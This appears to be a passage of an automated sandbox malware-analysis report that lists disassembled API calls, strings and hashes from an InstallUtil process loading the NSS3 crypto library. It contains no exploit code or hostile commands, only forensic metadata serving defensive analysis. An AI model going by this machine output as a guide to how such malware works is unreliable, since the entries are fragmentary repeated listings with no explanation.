                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1593528140-0
                                                                                                                  • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                  • Instruction ID: dcf9c0b5fc983d75212edc183cb7d895f69810899ff5bc857cfc661ab3de8a59
                                                                                                                  • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                  • Instruction Fuzzy Hash: 4F01C4B2A446015FE730DF2AFD45BC7B7A1EF49318F004935E95D86B21E632F8158792
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7E5B56
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E2D9C
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2DB2
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2DCF
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2DF2
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2E0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1593528140-0
                                                                                                                  • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                  • Instruction ID: 986770e1674d6ca6e07e1b57c96ee6e2efd88944ce60b9432499b05b4bbd78dc
                                                                                                                  • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                  • Instruction Fuzzy Hash: 120108B2A442015FE6309E29FD05BC7B3A5EF45318F000834E95D87B11D632F8258692
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C763090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C77AE42), ref: 6C7630AA
                                                                                                                    • Part of subcall function 6C763090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7630C7
                                                                                                                    • Part of subcall function 6C763090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7630E5
                                                                                                                    • Part of subcall function 6C763090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C763116
                                                                                                                    • Part of subcall function 6C763090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C76312B
                                                                                                                    • Part of subcall function 6C763090: PK11_DestroyObject.NSS3(?,?), ref: 6C763154
                                                                                                                    • Part of subcall function 6C763090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C76317E
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7599FF,?,?,?,?,?,?,?,?,?,6C752D6B,?), ref: 6C77AE67
                                                                                                                  • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7599FF,?,?,?,?,?,?,?,?,?,6C752D6B,?), ref: 6C77AE7E
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C752D6B,?,?,00000000), ref: 6C77AE89
                                                                                                                  • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C752D6B,?,?,00000000), ref: 6C77AE96
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C752D6B,?,?), ref: 6C77AEA3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 754562246-0
                                                                                                                  • Opcode ID: a819d11c0dc727a276d34b3a56492812398fc825b13f4520198e006b124dfc46
                                                                                                                  • Instruction ID: d93ab5b2bd318b86da73a8a482b2cfb9c6b09c95613613891685c0e475abeb72
                                                                                                                  • Opcode Fuzzy Hash: a819d11c0dc727a276d34b3a56492812398fc825b13f4520198e006b124dfc46
                                                                                                                  • Instruction Fuzzy Hash: 6B01D167B0411857FB21A16CAE8FAAF315C8B8766CB081032E809D7B01F692C90943F3
                                                                                                                  APIs
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C86A6D8), ref: 6C86AE0D
                                                                                                                  • free.MOZGLUE(?), ref: 6C86AE14
                                                                                                                  • DeleteCriticalSection.KERNEL32(6C86A6D8), ref: 6C86AE36
                                                                                                                  • free.MOZGLUE(?), ref: 6C86AE3D
                                                                                                                  • free.MOZGLUE(00000000,00000000,?,?,6C86A6D8), ref: 6C86AE47
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$CriticalDeleteSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 682657753-0
                                                                                                                  • Opcode ID: 6ba9a66ced54a0559403e80d1d8672276bf5f4329b331ef45368f59eb4532558
                                                                                                                  • Instruction ID: 5ad183729bbad7a624597ca8ee8912eba20c9aaf35e8f2904e89b5219dae8c07
                                                                                                                  • Opcode Fuzzy Hash: 6ba9a66ced54a0559403e80d1d8672276bf5f4329b331ef45368f59eb4532558
                                                                                                                  • Instruction Fuzzy Hash: 2EF0F6B5201A01A7CA209FE9E808A5BB7B8BF86778B100338E12A83941D733F012C7D1
                                                                                                                  APIs
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,01DC7D83), ref: 6C6E8990
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: @zol
                                                                                                                  • API String ID: 2221118986-1163342012
                                                                                                                  • Opcode ID: 6aada34075b5745195e2fc368f6f77f551d2d6e1c441b675fede156b92f5d3c2
                                                                                                                  • Instruction ID: 05c3322f431e8d0e3c90db974c674f106a1749afd2d974393b1b623ad8b23083
                                                                                                                  • Opcode Fuzzy Hash: 6aada34075b5745195e2fc368f6f77f551d2d6e1c441b675fede156b92f5d3c2
                                                                                                                  • Instruction Fuzzy Hash: 57510571A097919FC704CF28C5946A6BBF0BF19308B24929EC8884BB13D331F596CBD5
                                                                                                                  APIs
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C6E6D36
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C6E6D2A
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6E6D20
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6E6D2F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 632333372-598938438
                                                                                                                  • Opcode ID: 8afb3f75a9386eee32e7a17b1d6659ba39ab511d575fc65ce82a92fffcf993bf
                                                                                                                  • Instruction ID: 242160613bee05e699ab89617108388b14706c5d0d5d58e8d1dcf5679b1b4910
                                                                                                                  • Opcode Fuzzy Hash: 8afb3f75a9386eee32e7a17b1d6659ba39ab511d575fc65ce82a92fffcf993bf
                                                                                                                  • Instruction Fuzzy Hash: E02136306093089BC310CF1AC941B9AB7F2AF89318F54492ED9499BF51E3B0F949C79A
                                                                                                                  APIs
                                                                                                                  • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+|l,6C7C32C2,<+|l,00000000,00000000,?), ref: 6C7C2FDA
                                                                                                                    • Part of subcall function 6C7B14C0: TlsGetValue.KERNEL32 ref: 6C7B14E0
                                                                                                                    • Part of subcall function 6C7B14C0: EnterCriticalSection.KERNEL32 ref: 6C7B14F5
                                                                                                                    • Part of subcall function 6C7B14C0: PR_Unlock.NSS3 ref: 6C7B150D
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7C300B
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B10F3
                                                                                                                    • Part of subcall function 6C7B10C0: EnterCriticalSection.KERNEL32(?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B110C
                                                                                                                    • Part of subcall function 6C7B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1141
                                                                                                                    • Part of subcall function 6C7B10C0: PR_Unlock.NSS3(?,?,?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B1182
                                                                                                                    • Part of subcall function 6C7B10C0: TlsGetValue.KERNEL32(?,6C758802,00000000,00000008,?,6C74EF74,00000000), ref: 6C7B119C
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7C302A
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                    • Part of subcall function 6C79C3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C79C45D
                                                                                                                    • Part of subcall function 6C79C3D0: TlsGetValue.KERNEL32 ref: 6C79C494
                                                                                                                    • Part of subcall function 6C79C3D0: EnterCriticalSection.KERNEL32(?), ref: 6C79C4A9
                                                                                                                    • Part of subcall function 6C79C3D0: PR_Unlock.NSS3(?), ref: 6C79C4F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
                                                                                                                  • String ID: <+|l
                                                                                                                  • API String ID: 2538134263-1747921549
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C81CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C81CC7B), ref: 6C81CD7A
                                                                                                                    • Part of subcall function 6C81CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C81CD8E
                                                                                                                    • Part of subcall function 6C81CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C81CDA5
                                                                                                                    • Part of subcall function 6C81CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C81CDB8
                                                                                                                  • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C81CCB5
                                                                                                                  • memcpy.VCRUNTIME140(6C8B14F4,6C8B02AC,00000090), ref: 6C81CCD3
                                                                                                                  • memcpy.VCRUNTIME140(6C8B1588,6C8B02AC,00000090), ref: 6C81CD2B
                                                                                                                    • Part of subcall function 6C739AC0: socket.WSOCK32(?,00000017,6C7399BE), ref: 6C739AE6
                                                                                                                    • Part of subcall function 6C739AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7399BE), ref: 6C739AFC
                                                                                                                    • Part of subcall function 6C740590: closesocket.WSOCK32(6C739A8F,?,?,6C739A8F,00000000), ref: 6C740597
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                  • String ID: Ipv6_to_Ipv4 layer
                                                                                                                  • API String ID: 1231378898-412307543
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C80A480: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C82C3A2,?,?,00000000,00000000), ref: 6C80A528
                                                                                                                    • Part of subcall function 6C80A480: sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C80A6E0
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014576,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6DA94F
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C6DA943
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6DA939
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C6DA948
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 491875419-598938438
                                                                                                                  APIs
                                                                                                                  • calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C770715), ref: 6C768859
                                                                                                                  • PR_NewLock.NSS3 ref: 6C768874
                                                                                                                    • Part of subcall function 6C8198D0: calloc.MOZGLUE(00000001,00000084,6C740936,00000001,?,6C74102C), ref: 6C8198E5
                                                                                                                  • PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C76888D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: calloc$ArenaInitLockPool
                                                                                                                  • String ID: NSS
                                                                                                                  • API String ID: 2230817933-3870390017
                                                                                                                  APIs
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,?,6C7E5F25,?,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FA8A3
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE10
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE24
                                                                                                                    • Part of subcall function 6C79ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C77D079,00000000,00000001), ref: 6C79AE5A
                                                                                                                    • Part of subcall function 6C79ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE6F
                                                                                                                    • Part of subcall function 6C79ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AE7F
                                                                                                                    • Part of subcall function 6C79ADC0: TlsGetValue.KERNEL32(?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEB1
                                                                                                                    • Part of subcall function 6C79ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C77CDBB,?,6C77D079,00000000,00000001), ref: 6C79AEC9
                                                                                                                  • PK11_FreeSymKey.NSS3(?,00000000,?,6C7E5F25,?,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FA8BA
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(%_~l,00000000,00000000,?,6C7E5F25,?,?,?,?,?,?,?,?,?,6C7EAAD4), ref: 6C7FA8CF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterFreeK11_SectionValue$Item_UnlockUtilZfreefreememset
                                                                                                                  • String ID: %_~l
                                                                                                                  • API String ID: 2877228265-619745430
                                                                                                                  APIs
                                                                                                                  • PR_CallOnce.NSS3(6C8B14E4,6C81CC70), ref: 6C868569
                                                                                                                  • gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C8685AD
                                                                                                                  • GetLastError.KERNEL32(?,00000004,00000002), ref: 6C8685B6
                                                                                                                  • PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C8685C6
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4254312643-0
                                                                                                                  APIs
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C6F85D2,00000000,?,?), ref: 6C814FFD
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C81500C
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8150C8
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8150D6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
